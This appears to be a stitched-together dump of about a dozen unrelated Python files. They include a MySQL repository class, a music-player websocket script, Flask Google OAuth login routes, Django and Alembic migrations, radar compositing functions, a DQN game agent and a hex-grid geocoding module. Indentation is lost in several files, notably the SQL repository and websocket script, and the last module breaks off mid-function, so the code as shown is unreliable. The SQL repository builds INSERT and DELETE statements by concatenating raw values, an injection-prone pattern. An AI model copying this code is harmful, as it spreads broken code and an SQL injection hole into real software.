        # can stand in for its id. getItemById returns False (or None) when nothing matches.
        if self.getItemById(item) not in (None, False):
            raise ValueError("An item with the given id already exists")
command = "INSERT INTO " + self.__db + self.__db_params + " Values("
item = self.__objToSql(item)
sqlItem = ""
        for position, value in enumerate(item):
            if position != len(item) - 1:
                if isinstance(value, int):
                    sqlItem += '%s, ' % value
                else:
                    sqlItem += "'%s', " % value
            else:
                sqlItem += "'%s'" % value
command = command + sqlItem + ");"
try:
cnx = mysql.connector.connect(**self.__config)
cursor = cnx.cursor()
cursor.execute(command)
cnx.commit()
return True
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
raise ValueError("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
raise ValueError("Database does not exist")
else:
print(err)
pass
else:
cnx.close()
return True
def updateItemById(self, itemId, item):
'''
A function that updates an item from the repository by a given id
:param itemId: the id of the item we want to modify
:param item: the item with the new given properties
        :return: True if there were no errors and the item was updated successfully
'''
if self.getItemById(itemId) is False:
return False
self.deleteItemById(itemId)
self.createItem(item)
return True
def deleteItemById(self, itemId):
'''
        A function that deletes an item by a given id
        :param itemId: the id of the item we want to delete
        :return: True if there were no errors and the item was successfully deleted
'''
command = "Delete from " + self.__db + " where id= " + str(itemId)
try:
cnx = mysql.connector.connect(**self.__config)
cursor = cnx.cursor()
cursor.execute(command)
cnx.commit()
return True
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
raise ValueError("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
raise ValueError("Database does not exist")
else:
raise ValueError(str(err))
else:
cnx.close()
def __str__(self):
return Repository.__str__(self)
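# --- Usage sketch (everything below is a hypothetical example, not part of the project):
# the connection settings, table layout, and the Client mapper are assumptions made only
# to show how the constructor arguments fit together.
if __name__ == "__main__":
    example_config = {"user": "app", "password": "secret",
                      "host": "127.0.0.1", "database": "shop"}

    class Client:
        def __init__(self, client_id, name):
            self.id = client_id
            self.name = name

    repo = SqlRepo(example_config,
                   objFromSql=lambda client_id, name: Client(client_id, name),
                   objToSql=lambda client: [client.id, client.name],
                   db="clients",
                   db_params="(id, name)")
    # repo.createItem(Client(1, "Ada"))
    # print([c.name for c in repo.getAllLines()])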
|
"""DjAI Pre-Trained Torch Vision Model classes."""
|
#!/usr/bin/python
import argparse
import json
import logging
import signal
import sys
import time
import websocket
logger = logging.getLogger(__name__)
def signal_handler(sig, frame):
logger.debug('Received signal to stop, exiting')
sys.stdout.write('\n')
sys.stdout.flush()
sys.exit(0)
# Global player state
state = {
'playState': False,
}
channels = {
'playState': (lambda x: state.update({'playState': x['payload']})),
'track': (lambda x: state.update(x['payload'])),
'shuffle': (lambda x: state.update({'shuffle': x['payload']})),
'repeat': (lambda x: state.update({'repeat': x['payload']})),
'time': (lambda x: state.update(x['payload'])),
}
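# Based on the handlers above, each incoming websocket message is expected to be a JSON
# object of the form {"channel": "<name>", "payload": ...}, for example
# {"channel": "playState", "payload": true} or
# {"channel": "track", "payload": {"artist": "...", "title": "..."}}.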
def on_message(ws, message):
obj = json.loads(message)
    logger.info('Received new metadata: %s', obj['channel'])
clbk = channels.get(obj['channel'], lambda x: logger.error('Unexpected message from GPMDP: ' + x['channel']))
clbk(obj)
write_state()
def on_error(ws, error):
print(error)
def on_close(ws):
logger.info('Socket Closed')
write_output(' Disconnected')
def write_state():
    # log (rather than print) the state so stdout stays valid JSON for the consumer
    logger.debug('Player state: %s', state)
play = state['repeat'] == 'SINGLE_REPEAT' and '' or (state['shuffle'] == 'ALL_SHUFFLE' and '' or '')
args = [
        state['playState'] and play or '', ' | ',
        state.get('artist') or 'No artist', ' | ',
        state.get('title') or 'No music'
]
text = ''.join(args)
write_output(text)
def write_output(text):
logger.info('Writing output')
output = {'text': text,
'class': 'custom-gpmdp',
'alt': 'Google Play Music Daemon'}
sys.stdout.write(json.dumps(output) + '\n')
sys.stdout.flush()
def parse_arguments():
parser = argparse.ArgumentParser()
    # Increase verbosity with every occurrence of -v
parser.add_argument('-v', '--verbose', action='count', default=0)
# Define for which player we're listening
# parser.add_argument('--player')
return parser.parse_args()
def main():
arguments = parse_arguments()
# Initialize logging
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG,
format='%(name)s %(levelname)s %(message)s')
# Logging is set by default to WARN and higher.
# With every occurrence of -v it's lowered by one
logger.setLevel(max((3 - arguments.verbose) * 10, 0))
# Log the sent command line arguments
logger.debug('Arguments received {}'.format(vars(arguments)))
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
websocket.enableTrace(True)
ws = websocket.WebSocketApp("ws://localhost:5672/",
on_message=on_message,
on_error=on_error,
on_close=on_close)
ws.run_forever()
if __name__ == "__main__":
main()
|
from django.conf.urls import url
from djoser import views
urlpatterns = [
url(r"^token/login/?$", views.TokenCreateView.as_view(), name="login"),
url(r"^token/logout/?$", views.TokenDestroyView.as_view(), name="logout"),
]
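# Usage note (not part of the original file): with djoser's token authentication these
# routes are typically exercised as
#   POST /token/login/  with credentials            -> {"auth_token": "..."}
#   POST /token/logout/ with "Authorization: Token" -> the token is destroyed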
|
from ._dummy_data import make_fruit_sold_dummy_association_rules
from ._dummy_data import make_dummy_data_classification
from ._covid_id import make_covid_id
from ._covid_id import get_example_covid_id
__all__ = [
"make_fruit_sold_dummy_association_rules",
"make_dummy_data_classification",
"make_covid_id",
"get_example_covid_id",
]
|
import pytest
def test_classic_notebook_templates(jp_serverapp):
classic_notebook_templates = [
"notebook.html",
"tree.html"
]
# Get the server's template environment.
template_env = jp_serverapp.web_app.settings.get("notebook_jinja2_env")
for name in classic_notebook_templates:
template_env.get_template(name)
async def test_classic_notebook_asset_URLS(jp_fetch):
classic_notebook_paths = [
# Some classic notebook asset paths
'/static/notebook/js/main.js',
'/static/services/contents.js',
# NBclassic asset paths work too.
'/static/notebook/notebook/js/main.js',
'/static/notebook/services/contents.js',
]
for url_path in classic_notebook_paths:
r = await jp_fetch(url_path)
assert r.code == 200
|
from flask import Blueprint, request, jsonify, url_for, redirect
from flask_login import current_user, login_user, logout_user
from project import app, db, google_blueprint
from project.api.forms.forms import LoginForm
from project.models import User, OAuth
from sqlalchemy.orm.exc import NoResultFound
from flask_dance.consumer import oauth_authorized, oauth_error
from flask_dance.consumer.backend.sqla import OAuthConsumerMixin, SQLAlchemyBackend
from flask_dance.contrib.google import make_google_blueprint, google
login_blueprint = Blueprint('login', __name__)
@google_blueprint.route("/google_login/")
def index():
if not current_user.is_authenticated:
return redirect(url_for("google.login"))
resp = google.get("/oauth2/v2/userinfo")
assert resp.ok, resp.text
return "You are {email} on Google".format(email=resp.json()["email"])
@oauth_authorized.connect_via(google_blueprint)
def google_logged_in(blueprint, token):
if not token:
# flash("Failed to log in with Google.", category="error")
return False
resp = blueprint.session.get("/oauth2/v2/userinfo")
if not resp.ok:
msg = "Failed to fetch user info from Google."
# flash(msg, category="error")
return False
google_info = resp.json()
google_user_id = str(google_info["id"])
# Find this OAuth token in the database, or create it
query = OAuth.query.filter_by(
provider=blueprint.name,
provider_user_id=google_user_id,
)
try:
oauth = query.one()
except NoResultFound:
oauth = OAuth(
provider=blueprint.name,
provider_user_id=google_user_id,
token=token,
)
if oauth.user:
login_user(oauth.user)
# flash("Successfully signed in with google.")
else:
# Create a new local user account for this user
user = User(
# Remember that `email` can be None, if the user declines
# to publish their email address on google!
email=google_info["email"],
given_name=google_info["given_name"],
family_name=google_info["family_name"],
picture_url=google_info["picture"],
gender=google_info["gender"],
)
# Associate the new local user account with the OAuth token
oauth.user = user
# Save and commit our database models
db.session.add_all([user, oauth])
db.session.commit()
# Log in the new local user account
login_user(user)
# flash("Successfully signed in with google.")
# Disable Flask-Dance's default behavior for saving the OAuth token
return False
# notify on OAuth provider error
@oauth_error.connect_via(google_blueprint)
def google_error(blueprint, error, error_description=None, error_uri=None):
msg = (
"OAuth error from {name}! "
"error={error} description={description} uri={uri}"
).format(
name=blueprint.name,
error=error,
description=error_description,
uri=error_uri,
)
# flash(msg, category="error")
@login_blueprint.route('/login_standard/', methods=['POST'])
def login():
"""Logs a user in
Args:
login (str): The user's username or email
password (str): The user's non-hashed password
Returns:
200 - {'success': 'User <user_id> logged in'} if successful
400 - {'error_field': ['field error1', 'field error2'...]..., }
Notes:
If the user is logged in, they will be logged out before logging them
in to the requested username or email account.
"""
import time
if current_user.is_authenticated:
logout_user()
form = LoginForm()
if form.validate():
user = User.query.filter_by(email=form.email.data).one()
login_user(user)
response = jsonify({
'success': 'User {} logged in'.format(user.id)
})
response.status_code = 200
return response
response = jsonify(form.errors)
response.status_code = 400
return response
@login_blueprint.route('/logout/')
def logout():
"""Logs a user out """
logout_user()
response = jsonify({
'success': 'You have successfully logged out'
})
response.status_code = 200
return response
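# Example client call (illustrative; the host/port and the form field names are
# assumptions based on how LoginForm is read in login() above):
#
#   import requests
#   resp = requests.post("http://localhost:5000/login_standard/",
#                        data={"email": "user@example.com", "password": "secret"})
#   print(resp.status_code, resp.json())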
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2018-02-23 20:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('booking', '0004_booked_service_staff'),
]
operations = [
migrations.AlterField(
model_name='booked_service',
name='staff',
field=models.ManyToManyField(related_name='services_assigned', to='customers.Staff'),
),
]
|
#!/usr/bin/env python
# Copyright (c) 2016, wradlib developers.
# Distributed under the MIT License. See LICENSE.txt for more info.
"""
Composition
^^^^^^^^^^^
Combine data from different radar locations on one common set of locations
.. autosummary::
:nosignatures:
:toctree: generated/
extract_circle
togrid
compose_ko
compose_weighted
"""
import numpy as np
# from scipy.spatial import KDTree
# def extract_circle(center, radius, coords):
# """
# Extract the indices of coords which fall within a circle
# defined by center and radius
#
# Parameters
# ----------
# center : float
# radius : float
# coords : array of float with shape (numpoints,2)
#
# Returns
# -------
# output : 1-darray of integers
# index array referring to the coords array
#
# """
# print 'Building tree takes:'
# t0 = dt.datetime.now()
# tree = KDTree(coords)
# print dt.datetime.now() - t0
# print 'Query tree takes:'
# t0 = dt.datetime.now()
# ix = tree.query(center, k=len(coords), distance_upper_bound=radius)[1]
# print dt.datetime.now() - t0
# ix = ix[np.where(ix<len(coords))[0]]
# return ix
def extract_circle(center, radius, coords):
"""
Extract the indices of coords which fall within a circle
defined by center and radius
Parameters
----------
center : float
radius : float
coords : array of float with shape (numpoints,2)
Returns
-------
output : 1-darray of integers
index array referring to the coords array
"""
return np.where(((coords - center) ** 2).sum(axis=-1) < radius ** 2)[0]
def togrid(src, trg, radius, center, data, interpol, *args, **kwargs):
"""
Interpolate data from a radar location to the composite grid or set of
locations
Parameters
----------
src : ndarray of float of shape (numpoints, ndim)
cartesian x / y coordinates of the radar bins
trg : ndarray of float of shape (numpoints, ndim)
cartesian x / y coordinates of the composite
radius : float
the radius of the radar circle (same units as src and trg)
center : array of float
the location coordinates of the radar
data : ndarray of float
the data that should be transferred to composite
interpol : an interpolation class name from :meth:`wradlib.ipol`
e.g. :class:`~wradlib.ipol.Nearest` or :class:`~wradlib.ipol.Idw`
Other Parameters
----------------
*args : arguments of Interpolator (see class documentation)
Keyword Arguments
-----------------
**kwargs : keyword arguments of Interpolator (see class documentation)
Returns
-------
output : ndarray of float
data of the radar circle which is interpolated on the composite grid
Examples
--------
See :ref:`notebooks/basics/wradlib_workflow.ipynb#Gridding`.
"""
# get indices to select the subgrid from the composite grid
ix = extract_circle(center, radius, trg)
# interpolate on subgrid
ip = interpol(src, trg[ix], *args, **kwargs)
data_on_subgrid = ip(data).reshape((len(ix)))
# create container for entire grid
composegridshape = [len(trg)]
composegridshape.extend(data.shape[1:])
compose_grid = np.repeat(np.nan, len(trg) *
np.prod(data.shape[1:])).reshape(composegridshape)
# push subgrid results into the large grid
compose_grid[ix] = data_on_subgrid
return compose_grid
def compose_ko(radargrids, qualitygrids):
"""Composes grids according to quality information using quality \
information as a knockout criterion.
The value of the composed pixel is taken from the radargrid whose
quality grid has the highest value.
Parameters
----------
radargrids : list of arrays
radar data to be composited. Each item in the list corresponds to the
data of one radar location. All items must have the same shape.
qualitygrids : list of arrays
quality data to decide upon which radar site will contribute its pixel
        to the composite. The length of this list must be the same as that
of `radargrids`. All items must have the same shape and be aligned with
the items in `radargrids`.
Returns
-------
composite : array
"""
# first add a fallback array for all pixels having missing values in all
# radargrids
radarfallback = (np.repeat(np.nan, np.prod(radargrids[0].shape))
.reshape(radargrids[0].shape))
radargrids.append(radarfallback)
radarinfo = np.array(radargrids)
# then do the same for the quality grids
qualityfallback = (np.repeat(-np.inf, np.prod(radargrids[0].shape))
.reshape(radargrids[0].shape))
qualitygrids.append(qualityfallback)
qualityinfo = np.array(qualitygrids)
select = np.nanargmax(qualityinfo, axis=0)
composite = (radarinfo.reshape((radarinfo.shape[0], -1))
[select.ravel(), np.arange(np.prod(radarinfo.shape[1:]))]
.reshape(radarinfo.shape[1:]))
radargrids.pop()
qualitygrids.pop()
return composite
def compose_weighted(radargrids, qualitygrids):
"""Composes grids according to quality information using a weighted \
averaging approach.
The value of the composed pixel is the weighted average of all radar
pixels with the quality values being the weights.
Parameters
----------
radargrids : list of arrays
qualitygrids : list of arrays
Returns
-------
composite : array
Examples
--------
See :ref:`notebooks/workflow/recipe1.ipynb`.
See Also
--------
compose_ko : for more description about the shape of the input arrays
"""
radarinfo = np.array(radargrids)
qualityinfo = np.array(qualitygrids)
# overall nanmask
nanmask = np.all(np.isnan(radarinfo), axis=0)
# quality grids must contain values only where radarinfo does
qualityinfo[np.isnan(radarinfo)] = np.nan
qualityinfo /= np.nansum(qualityinfo, axis=0)
composite = np.nansum(radarinfo * qualityinfo, axis=0)
composite[nanmask] = np.nan
return composite
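# Minimal numeric illustration of compose_weighted (values are invented):
#
#     r1 = np.array([1.0, 2.0, np.nan])
#     r2 = np.array([3.0, np.nan, np.nan])
#     q1 = np.array([1.0, 1.0, 1.0])
#     q2 = np.array([3.0, 1.0, 1.0])
#     compose_weighted([r1, r2], [q1, q2])
#     # -> array([2.5, 2. , nan]); pixel 0 is the 1:3 weighted mean, pixel 2 stays NaN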
if __name__ == '__main__':
print('wradlib: Calling module <comp> as main...')
|
#!/usr/bin/env python3
"""
Python 3
Try to get all questions from an instrument
"""
import colectica
from colectica import ColecticaObject
import api
import pandas as pd
import os
import numpy as np
import json
def from_instrument_get_question_response(C, Agency, ID):
"""
From an instrument get all questions, all response
"""
df_instrument_set, instrument_info = C.item_info_set(Agency, ID)
df_question = df_instrument_set.loc[(df_instrument_set.ItemType == 'Question') , :]
question_df_list = []
codelist_df_list = []
response_df_list = []
    for question_id in df_question['Identifier']:
        # print(question_id)
        # use a separate name so the DataFrame being iterated over is not rebound
        df_q, df_response = C.get_question_all(Agency, question_id)
        # store DataFrame in list
        question_df_list.append(df_q)
        if df_q['response_type'][0] == 'CodeList':
            codelist_df_list.append(df_response)
        else:
            response_df_list.append(df_response)
df_question_all = pd.concat(question_df_list)
if codelist_df_list == []:
df_codelist_all = pd.DataFrame()
else:
df_codelist_all = pd.concat(codelist_df_list)
if response_df_list == []:
df_response_all = pd.DataFrame()
else:
df_response_all = pd.concat(response_df_list)
return instrument_info, df_question_all, df_codelist_all, df_response_all
def from_instrument_get_statement(C, Agency, ID):
"""
From an instrument get all Statement
"""
df_instrument_set, instrument_info = C.item_info_set(Agency, ID)
df_statement = df_instrument_set.loc[(df_instrument_set.ItemType == 'Statement') , :]
statement_df_list = []
    for statement_id in df_statement['Identifier']:
        dict_statement = C.item_to_dict(Agency, statement_id)
        # use a separate name so the DataFrame being iterated over is not rebound
        df_stmt = pd.DataFrame([dict_statement], columns=dict_statement.keys())
        statement_df_list.append(df_stmt)
if not statement_df_list == []:
df_statement_all = pd.concat(statement_df_list)
else:
df_statement_all = pd.DataFrame(columns=['AgencyId', 'Version', 'Identifier', 'URN', 'SourceId', 'Instruction', 'Label', 'Literal'])
return df_statement_all
def main():
outdir = 'instrument'
if not os.path.exists(outdir):
os.makedirs(outdir)
hostname = None
username = None
password = None
if not hostname:
hostname = input ("enter the url of the site: ")
if not username:
username = input("enter your username: ")
if not password:
password = input("enter your password: ")
C = ColecticaObject(hostname, username, password)
# get all instruments
# L = C.general_search('f196cc07-9c99-4725-ad55-5b34f479cf7d', '', 0)
# print(L['TotalResults']) # 313
# json.dump(L, open(os.path.join(outdir, 'all_instrument.txt'),'w'))
L = json.load(open(os.path.join(outdir, 'all_instrument.txt')))
# print(L)
all_idx = np.array(range(L['TotalResults']))
# split into 10 chunks
chunks = np.array_split(all_idx, 10)
this_chunk = 9
for i in chunks[this_chunk]:
print(i)
Agency = L['Results'][i]['AgencyId']
ID = L['Results'][i]['Identifier']
Version = L['Results'][i]['Version']
        instrument_name = ' '.join(L['Results'][i]['ItemName'].values()).replace(' ', '_')
instrument_dir = os.path.join(outdir, instrument_name)
if not os.path.exists(instrument_dir):
os.makedirs(instrument_dir)
# From an instrument get all questions, all response, print to file
instrument_info, df_question_all, df_codelist_all, df_response_all = from_instrument_get_question_response(C, Agency, ID)
with open(os.path.join(instrument_dir, 'instrument.txt'), 'w') as f:
print(instrument_info, file=f)
df_question_all.to_csv(os.path.join(instrument_dir, 'question.csv'), index=False, sep='\t')
df_codelist_all.to_csv(os.path.join(instrument_dir, 'codelist.csv'), index=False, sep='\t')
df_response_all.to_csv(os.path.join(instrument_dir, 'response.csv'), index=False, sep='\t')
# From an instrument get all statements
df_statement_all = from_instrument_get_statement(C, Agency, ID)
df_statement_out = df_statement_all.loc[:, ['AgencyId', 'Version', 'Identifier', 'URN', 'SourceId', 'Instruction', 'Label', 'Literal']]
df_statement_out.to_csv(os.path.join(instrument_dir, 'statement.csv'), index=False, sep='\t')
if __name__ == '__main__':
main()
|
import random
import gym
import numpy as np
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten, BatchNormalization,Activation
from tensorflow.keras.optimizers import Adam
from scores.score_logger import ScoreLogger
ENV_NAME = "TimePilot-ram-v0"
GAMMA = 0.95
LEARNING_RATE = 0.001
MEMORY_SIZE = 1000000
BATCH_SIZE = 20
EXPLORATION_MAX = 1.0
EXPLORATION_MIN = 0.01
EXPLORATION_DECAY = 0.995
NUM_EPISODES=2
WATCH_TRAINING=False
class DQNSolver:
def __init__(self, observation_input,action_space):
self.exploration_rate = EXPLORATION_MAX
self.observation_input=observation_input
self.action_space = action_space
self.memory = []
self.model = Sequential()
self.model.add(Dense(24, input_shape=observation_input, activation="relu"))
self.model.add(Flatten())
self.model.add(Dense(24, use_bias=False))
self.model.add(BatchNormalization())
self.model.add(Activation("relu"))
self.model.add(Dense(action_space, use_bias=False))
self.model.add(BatchNormalization())
self.model.add(Activation("linear"))
self.model.compile(loss="mse", optimizer=Adam(lr=LEARNING_RATE))
def predict(self,state):
return self.model.predict(state)
def remember(self, state, action, reward, next_state, done):
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
if np.random.rand() < self.exploration_rate:
return random.randrange(self.action_space)
        q_values = self.predict(state)[0]
        return np.argmax(q_values)
def experience_replay(self):
if len(self.memory) < BATCH_SIZE:
return
batch = random.sample(self.memory, BATCH_SIZE)
for state, action, reward, state_next, terminal in batch:
q_update = reward
if not terminal:
#new q value for this state/action pair is equal to the reward gained by taking this action at this state, plus the expected reward to be gained for the rest of the game.
                #GAMMA is a parameter relating to the short/long-term planning tendencies of the model. A high GAMMA means we're planning ahead; a low one means we're focusing mostly on short-term rewards.
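                #i.e. the temporal-difference target: Q(s, a) <- reward + GAMMA * max_a' Q(s', a')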
q_update = (reward + GAMMA * np.amax(self.predict(state_next)[0]))
q_values = self.predict(state)
q_values[0][action] = q_update
self.model.fit(state, q_values, verbose=0)
self.exploration_rate *= EXPLORATION_DECAY
self.exploration_rate = max(EXPLORATION_MIN, self.exploration_rate)
def reshape_dims(obs_space):
dims=[1]
for i in range(len(obs_space.shape)):
dims.append(obs_space.shape[i])
return dims
def find_input_shape(env):
input_shape=None
#Box
if(type(env.observation_space)==gym.spaces.box.Box):
input_shape=env.observation_space.shape
#Discrete
elif(type(env.observation_space)==gym.spaces.discrete.Discrete):
input_shape=[env.observation_space.n]
return input_shape
class ActionSpaceError(Exception):
pass
def training():
env = gym.make(ENV_NAME)
# If the user chooses an environment with a non-discrete action space, return an error because DQN only works with discrete action spaces
if(type(env.action_space)!=gym.spaces.discrete.Discrete):
        raise ActionSpaceError('This environment uses an action space that is not discrete. DQN can only be trained using discrete action spaces. Please select an environment with a discrete action space.')
act_space=env.action_space.n
score_logger = ScoreLogger(ENV_NAME)
observation_input=find_input_shape(env)
dims=reshape_dims(env.observation_space)
dqn_solver = DQNSolver(observation_input,act_space)
for i in range(NUM_EPISODES):
state = env.reset()
#reshape state array if it has more than one dimension
if(len(dims)>1):
state = state.reshape(dims)
step = 0
while True:
step += 1
if(WATCH_TRAINING):
env.render()
action = dqn_solver.act(state)
state_next, reward, terminal, info = env.step(action)
reward = reward if not terminal else -reward
#reshape state array if it has more than one dimension
if(len(dims)>1):
state_next = state_next.reshape(dims)
dqn_solver.remember(state, action, reward, state_next, terminal)
state = state_next
if terminal:
print("Run: " + str(i+1) + ", exploration: " + str(dqn_solver.exploration_rate) + ", score: " + str(step))
score_logger.add_score(step, i+1)
break
dqn_solver.experience_replay()
return dqn_solver
def testing(dqn_solver):
env=gym.make(ENV_NAME)
dims=reshape_dims(env.observation_space)
step=0
#set exploration rate to be 0 so that we just follow the q function's policy
dqn_solver.exploration_rate=0
state=env.reset()
#reshape state array if it has more than one dimension
if(len(dims)>1):
state = state.reshape(dims)
while True:
step+=1
env.render()
action=dqn_solver.act(state)
next_state,reward,terminal,info=env.step(action)
if(terminal):
break
#reshape state array if it has more than one dimension
if(len(dims)>1):
state = next_state.reshape(dims)
if __name__ == "__main__":
solution=training()
testing(solution)
|
"""
Added public field to the report table
Revision ID: 1fb575f848af
Revises: 492fe78451c6
Create Date: 2014-02-28 02:14:43.655893
"""
# revision identifiers, used by Alembic.
revision = '1fb575f848af'
down_revision = '492fe78451c6'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('report', sa.Column('public', sa.Boolean(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('report', 'public')
### end Alembic commands ###
|
# coding: utf-8
from .projection import *
import math
from functools import reduce  # needed by get_wkt / get_wkt_deg (reduce is not a builtin in Python 3)
__all__ = ["create_zone", "create_zone_by_code", "meter2hex", "hex2deg", "hex2meter", "deg2hex", "encode", "decode", "create_zones_by_extent"]
HEX_KEY = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
WKB_TMPL = "POLYGON(({0} {1}, {2} {3}, {4} {5}, {6} {7}, {8} {9}, {10} {11}, {0} {1}))"
class Zone(object):
"""Hex Zone"""
def __init__(self, level, hex_x_no, hex_y_no):
self._code = encode(level, hex_x_no, hex_y_no)
self._hex_x_no = hex_x_no
self._hex_y_no = hex_y_no
self._level = level
self._x, self._y = hex2meter(self._level, self._hex_x_no, self._hex_y_no)
self._lon, self._lat = meter2deg(self._x, self._y)
@property
def code(self):
return self._code
@property
def hex_x_no(self):
return self._hex_x_no
@property
def hex_y_no(self):
return self._hex_y_no
@property
def level(self):
return self._level
def get_parent(self):
return create_zone_by_code(self._code[:-1])
def get_children(self):
return [create_zone_by_code(self._code + c) for c in "012345678"]
def get_movable_zones(self, distance):
result = []
for delta_y in range(-distance, distance + 1):
minx = -distance + delta_y if delta_y > 0 else -distance
maxx = distance + delta_y if delta_y < 0 else distance
for delta_x in range(minx, maxx + 1):
if delta_x == delta_y == 0: continue
result.append(Zone(self._level, self._hex_x_no + delta_x, self._hex_y_no + delta_y))
return result
def __eq__(self, other):
return other.code == self._code
def __hash__(self):
return hash(self._code)
def get_distance(self, other):
if self._level != other.level:
raise Exception("Level must be same")
delta_x = self._hex_x_no - other.hex_x_no
delta_y = self._hex_y_no - other.hex_y_no
abs_delta_x = abs(delta_x)
abs_delta_y = abs(delta_y)
if delta_x * delta_y > 0:
return abs_delta_x if abs_delta_x > abs_delta_y else abs_delta_y
return abs_delta_x + abs_delta_y
def get_vertices(self):
h_len = HEX_LEN / math.pow(3, self._level)
half_h_len = h_len / 2
h_height = half_h_len * math.sqrt(3)
self._x, self._y = hex2meter(self._level, self._hex_x_no, self._hex_y_no)
h_top = self._y + h_height
h_btm = self._y - h_height
h_l = self._x - h_len
h_r = self._x + h_len
h_cl = self._x - half_h_len
h_cr = self._x + half_h_len
return ((h_l, self._y),
(h_cl, h_top),
(h_cr, h_top),
(h_r, self._y),
(h_cr, h_btm),
(h_cl, h_btm))
def get_vertices_deg(self):
return tuple(meter2deg(m[0], m[1]) for m in self.get_vertices())
def get_wkt(self):
return WKB_TMPL.format(*reduce(lambda a, b: a+b, self.get_vertices()))
def get_wkt_deg(self):
return WKB_TMPL.format(*reduce(lambda a, b: a+b, self.get_vertices_deg()))
def create_zone(level, lon, lat):
return Zone(level, *deg2hex(level, lon, lat))
def create_zone_by_code(hexcode):
return Zone(*decode(hexcode))
def deg2hex(level, lon, lat):
"""degree to hex xy"""
x, y = deg2meter(lon, lat)
return meter2hex(level, x, y)
def meter2hex(level, x, y):
"""meter to hex xy"""
h_len = HEX_LEN / math.pow(3, level)
hy = y - (1 / math.sqrt(3)) * x
hx = y + (1 / math.sqrt(3)) * x
# h_base = 3 * h_len / sqrt(3)
h_base = h_len * math.sqrt(3)
hex_x_coord = hx / h_base
hex_y_coord = hy / h_base
hex_x_coord_org = math.floor(hex_x_coord)
hex_y_coord_org = math.floor(hex_y_coord)
hex_x_no = round(hex_x_coord)
hex_y_no = round(hex_y_coord)
#Y > -X + hex_x_coord_org + hex_y_coord_org + 1
if hex_y_coord >= -hex_x_coord + hex_x_coord_org + hex_y_coord_org + 1:
#Y > 0.5X + hex_y_coord_org - 0.5hex_x_coord_org
#Y < 2X - 2hex_x_coord_org + hex_y_coord_org
if 0.5 * hex_x_coord - 0.5 * hex_x_coord_org + hex_y_coord_org < hex_y_coord \
< 2.0 * hex_x_coord - 2.0 * hex_x_coord_org + hex_y_coord_org:
hex_x_no = hex_x_coord_org + 1
hex_y_no = hex_y_coord_org + 1
#Y < -X + hex_x_coord_org + hex_y_coord_org + 1
elif hex_y_coord < -hex_x_coord + hex_x_coord_org + hex_y_coord_org + 1:
#Y > 2X - 2hex_x_coord_org + hex_y_coord_org - 1
#Y < 0.5X - 0.5hex_x_coord_org + hex_y_coord_org + 0.5
if 2.0 * hex_x_coord - 2.0 * hex_x_coord_org + hex_y_coord_org - 1 < hex_y_coord \
< 0.5 * hex_x_coord - 0.5 * hex_x_coord_org + hex_y_coord_org + 0.5:
hex_x_no = hex_x_coord_org
hex_y_no = hex_y_coord_org
x = (hex_x_no * h_base - hex_y_no * h_base) * (math.sqrt(3) / 2)
if HALF_EL - x < h_len / 2:
tmp_x_no = hex_x_no
hex_x_no = hex_y_no
hex_y_no = tmp_x_no
return int(hex_x_no), int(hex_y_no)
def hex2deg(level, hex_x, hex_y):
"""hex xy to degree"""
return meter2deg(*hex2meter(level, hex_x, hex_y))
def hex2meter(level, hex_x, hex_y):
"""hex xy to meter"""
h_len = HEX_LEN / math.pow(3, level)
y = (hex_x + hex_y) * h_len * math.sqrt(3) / 2.0
x = (hex_x - hex_y) * h_len * 3.0 / 2.0
return x, y
def encode(level, hex_x_no, hex_y_no):
"""encode hex xy to hexcode"""
codes = []
for i in range(-2, level + 1, 1):
base = math.pow(3, level - i)
boundary = math.ceil(base / 2)
code = 0
if hex_x_no <= -boundary:
hex_x_no += base
elif hex_x_no >= boundary:
code += 6
hex_x_no -= base
else:
code += 3
if hex_y_no <= -boundary:
hex_y_no += base
elif hex_y_no >= boundary:
code += 2
hex_y_no -= base
else:
code += 1
codes.append(str(code))
head_code = int("".join(codes[:3]))
quotient = head_code // 30
remainder = head_code % 30
head_code_hex = HEX_KEY[quotient] + HEX_KEY[remainder]
return head_code_hex + "".join(codes[3:])
def decode(code):
"""hexcode to hex xy"""
level = len(code) - 2
quotient = HEX_KEY.index(code[0])
remainder = HEX_KEY.index(code[1])
head_code = "{0:03}".format(quotient * 30 + remainder)
base_code = head_code + code[2:]
hex_x_no = 0
hex_y_no = 0
for i, c in enumerate(base_code):
x = int(c) // 3
y = int(c) % 3
base = math.pow(3, level + 2 - i)
if x == 0:
hex_x_no -= base
elif x == 2:
hex_x_no += base
if y == 0:
hex_y_no -= base
elif y == 2:
hex_y_no += base
return level, int(hex_x_no), int(hex_y_no)
def create_zones_by_extent(level, minx, miny, maxx, maxy):
""" """
ll_zone = create_zone(level, minx, miny)
lr_zone = create_zone(level, maxx, miny)
ul_zone = create_zone(level, minx, maxy)
ur_zone = create_zone(level, maxx, maxy)
#if ll_zone.hex_x_no + ll_zone.hex_y_no > lr_zone.hex_x_no + lr_zone.hex_y_no:
# lr_zone = Zone(level, lr_zone.hex_x_no + 1, lr_zone.hex_y_no)
#elif ll_zone.hex_x_no + ll_zone.hex_y_no < lr_zone.hex_x_no + lr_zone.hex_y_no:
# lr_zone = Zone(level, lr_zone.hex_x_no , lr_zone.hex_y_no -1)
#if ul_zone.hex_x_no + ul_zone.hex_y_no < ur_zone.hex_x_no + ur_zone.hex_y_no:
# ur_zone = Zone(level, ur_zone.hex_x_no + 1, ur_zone.hex_y_no)
#elif ul_zone.hex_x_no + ul_zone.hex_y_no < ur_zone.hex_x_no + ur_zone.hex_y_no:
# ur_zone = Zone(level, ur_zone.hex_x_no , ur_zone.hex_y_no -1)
to_remove = set()
